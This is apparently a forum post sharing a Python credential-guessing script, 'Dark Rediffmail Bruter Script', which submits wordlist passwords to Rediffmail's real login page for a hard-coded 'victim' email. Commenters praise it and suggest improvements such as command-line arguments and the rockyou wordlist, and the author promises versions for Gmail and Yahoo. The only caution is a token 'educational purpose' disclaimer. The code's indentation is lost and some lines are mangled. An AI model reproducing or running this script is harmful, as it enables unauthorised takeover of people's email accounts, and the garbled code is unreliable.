import mechanize
import cookielib
import sys
email = "victim@rediffmail.com"; #victim email
wordlist = "wordlist.txt"; #wordlist file
url = "https://mail.rediff.com/cgi-bin/login.cgi";
print """
Dark Rediffmail Bruter Script.
Written By : Tanmay Upadhyay India
Email : kevinmetnik606@gmail.com
WARNING Only for educational purpose dont use it for hacking purpose.
\n
"""
def brute():
if(email == ""):
print "\n\tError Sorry we cant able to find email to attack.";
sys.exit(1);
br = mechanize.Browser();
cj = cookielib.CookieJar();
br.setcookiejar(cj);
br.sethandlerobots(False);
br.sethandlerefresh(mechanize.http.HTTPRefreshProcessor(),maxtime = 1);
br.sethandlereferer(True);
f = open(wordlist,'r');
data = f.readlines();
datalen = len(data);
br.open(url);
print "+ Wordlist contain max %s words."%datalen;
print "! Connected to Rediffmail server.";
print "\n\tStarting a wordlist attack.....";
print "\n";
for pas in data:
pas = pas.replace("\n","");
br.selectform(name="loginform");
br.form'login' = email;
br.form'passwd' = pas;
br.submit();
if(br.geturl() == url):
print "error password %s in not correct."%pas;
else:
print "success correct password found.";
print "\n\tEmail => %s \n\tPassword => %s"%(email,pas);
print "\n"
br.close();
sys.exit(1);
try:
brute();
except KeyboardInterrupt:
print "\n\t+ Operation Cancelled by Attacker Ctrl + C Pressed.";
sys.exit(1);
except IOError:
print "\n\tError Unable to locate or open wordlist file.";
print "\n";
sys.exit(1);
except:
pass
just wanted to share,
Thanks
13 Responses
This script is from the facebook account cracker. Atleast, state the help source. Thanks anyway for awesome script.
@Joe, I don't think it is. Check it out: Python - Facebook Pentester By Mauritania Hacker
Will you please provide raw code for this, maybe through pastebin or anything else....
lol that's totally different. --
Will you please provide raw code for this, maybe through pastebin or anything else....
Thanks for the share . Can you post it on pastebin or any of the paste sites and link it back here?
This CMS is de-void of code brackets and makes it extremely unfriendly to the coders who want to share anything of a code nature.
Although you could share how to sharpen a knife, use bacon in unholy ways or how to void your phones warranty very easy here.
<!-- kevinmetnik606 of Security is fake a.k.a 13lackD3m0n ? -->
kk thanks bro :)
Nice code :)
I have a little suggestion...
The script could take email and wordlist as input after you run the code, so instead of modifying the code each time you run it, you just feed it some parameters.
wordlist = str(raw_input("Enter your wordlist: "))
email = str(raw_input("Enter the email: "))
Or you could make it even better, you enter the parameters prior to running the code, such as:
python rediff.py /usr/share/wordlists/rockyou.txt someone@mail.com
For that, you just have to add this at the beginning:
from sys import argv
script, wordlist, email = argv
ok thanks for suggestion. i'll soon work on it and also try to develop gmail,yahoo and others :)
This is a dictionary attack, not a bruteforce attack. Make sure you use the right terminology.
Here is pastebin link of my script : http://pastebin.com/MRMTdMu8
Here's output of my script :) it work very fast in single thread also just give it a try. http://pastebin.com/MRMTdMu8
It only works on Rediff mail or we can use this script somewhere else
Share Your Thoughts